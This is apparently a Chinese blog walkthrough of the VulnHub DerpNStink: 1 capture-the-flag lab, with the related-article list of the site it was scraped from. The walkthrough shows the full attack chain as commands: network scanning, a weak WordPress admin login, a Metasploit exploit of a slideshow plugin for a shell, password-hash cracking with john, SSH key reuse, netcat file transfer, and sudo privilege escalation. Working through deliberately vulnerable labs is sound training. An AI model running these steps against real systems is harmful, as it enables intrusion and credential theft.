当前位置: 首页 > news >正文

Vulhub DerpNStink: 1靶机详解

news 2025/6/26 9:22:38

项目地址

https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova

实验过程

开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

根据对比可知DerpNStink: 1的一个ip地址为192.168.47.170

扫描DerpNStink: 1的操作系统,端口及对应服务

nmap -A -p- 192.168.47.170

发现该靶机开放了21,22,80端口

信息收集

访问网站

没什么有用信息

右键查看源码

翻找得到一个flag

flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

目录扫描

dirb http://192.168.47.170

拼接/weblog/wp-admin/,发现出现跳转,需要对其在hosts文件对域名和IP进行绑定(hosts文件位置:/etc/hosts),再重新访问

尝试弱口令admin admin

登陆成功,并且知道了wordpress的版本为4.6.9

获取shell

使用wpscan扫描网站插件

wpscan --url http://derpnstink.local/weblog

使用msf搜索其插件的历史漏洞

msfconsole
search slideshow
use 1
show options
set rhosts derpnstink.local
set WP_PASSWORD admin
set WP_USER admin
set TARGETURI /weblog
run


shell
python -c 'import pty;pty.spawn("/bin/bash")'

在网站根目录找到了数据库的账号密码

cd /var/www/html/weblog
ls
cat wp-config.php

拼接/php/phpmyadmin/

来到数据库的登录页面

使用刚才的账号密码进行登录

登陆成功

四处翻翻在wordpress—>wp_posts发现了第二个flag

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

点击wordpress—>wp_users,发现了两组账号密码

unclestinky   $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin         $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

将密码写入666.txt文件中,使用john对其进行解密

john 666.txt --wordlist=rockyou.txt

使用第二个用户unclestinky wedgie57登录wordpress

发现该账户为管理员用户

查看/etc/passwd文件,发现了处root用户的其它两个存在shell的用户:stinky 、 mrderp

尝试使用现有的密码分别进行登录,发现使用stinky/wedgie57登录成功

并在桌面发现了第三个flag

flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

尝试使用上述账号密码登录ftp,发现登陆成功

翻看每个目录,在ssh目录下发现了key.txt文件

跟套娃一样套了好多ssh目录

下载key.txt

get key.txt
cat kry.txt

看起来像个密钥

赋予权限,利用ssh指定密钥登录

chmod 600 key.txt
ssh -i key.txt stinky@192.168.47.170

失败了,可能是因为证书失效在后面加一段命令-o PubkeyAcceptedKeyTypes=+ssh-rsa

ssh -i key.txt stinky@192.168.47.170 -o PubkeyAcceptedKeyTypes=+ssh-rsa

登录成功

提权

在Document目录下发现一个 pcap 文件,尝试将其下载至本地

利用nc传输文件

目标机器:nc -nv 192.168.47.129 2429  < derpissues.pcap
kali:	  nc -lvvp 2429 > derpissues.pcap

kali开启一个http服务

python -m http.server

在本机访问,下载pcap文件

扔到wireshark中查看

使用搜索语句

ip.src == 127.0.0.1 && http.request.method == "POST"

得到 了mrderp用户的密码:derpderpderpderpderpderpderp

切换mrderp用户

查看当前权限

查看可利用命令

sudo -l

创建binaries目录以及用户提权的脚本

mkdir binaries
cd binaries
touch derpy.sh
echo '#!/bin/bash' > derpy.sh
echo '/bin/bash' >> derpy.sh
chmod +x derpy.sh
sudo ./derpy.sh

提权成功


http://www.mrgr.cn/news/50786.html

相关文章:

  • MySQL索引、事物与存储引擎
  • (二)Python输入输出函数
  • MATLAB(Octave)混电动力能耗评估
  • 2024年四非边缘鼠鼠计算机保研回忆(记录版 碎碎念)
  • Redis技术指南:数据类型、事务处理与过期键管理
  • VRP_用MDP建模_20241015
  • [Linux] 创建可以免密登录的SFTP用户
  • Pyenv 介绍和安装指南 - Ubuntu 24
  • opencv学习:人脸识别器特征提取BPHFaceRecognizer_create算法的使用
  • unity学习-Directional light光的设置
  • 爬虫之数据解析
  • 详解腐烂的苹果(图+代码+广度优先遍历)
  • 快捷支付的优势和特点
  • 中心极限定理的Python实践
  • 【p2p、分布式,区块链笔记 UPNP】: 简单服务发现协议 SSDP
  • 『大模型笔记』pip3 install -e .[stable]作用!
  • 【Linux】基础IO
  • 获取上海证券交易所和深圳证券交易所上市公司的实时股票数据
  • 三本非OA顶级快刊,IEEE Trans“灌水神刊”4个月录用!领域内佼佼者,你选谁?
  • 文件IO练习1